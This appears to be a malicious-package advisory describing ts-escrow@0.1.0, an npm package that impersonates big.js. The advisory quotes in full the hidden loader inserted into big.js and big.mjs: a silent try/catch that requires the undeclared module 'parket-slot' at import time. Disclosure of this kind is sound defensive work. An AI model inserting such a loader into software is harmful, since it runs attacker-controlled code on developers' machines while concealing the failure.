MAL-2026-6320

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (9607025df61aa1728bceb1a71534460a9e9edf2f3cd1d4eedd533238786577c2) ts-escrow@0.1.0 is a verbatim copy of the big.js library (README, repository URL, author, version banner, and description all impersonate MikeMcl/big.js) republished under an unrelated name. Inserted between unrelated method definitions in big.js and big.mjs is a top-level, error-swallowing loader: `try { const doc = require('parket-slot'); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }`. The 'parket-slot' module is not declared in package.json. The manifest instead declares an unrelated dependency 'log-taker1' (^0.1.0), also unrelated to big.js's documented zero-dependency posture. Any developer who installs ts-escrow and require()s it triggers loading of an attacker-controlled companion module at import time, with errors silently swallowed to evade detection. The combination of library impersonation, hidden require() of an undeclared package, and silent error handling is the textbook supply-chain trojan loader pattern.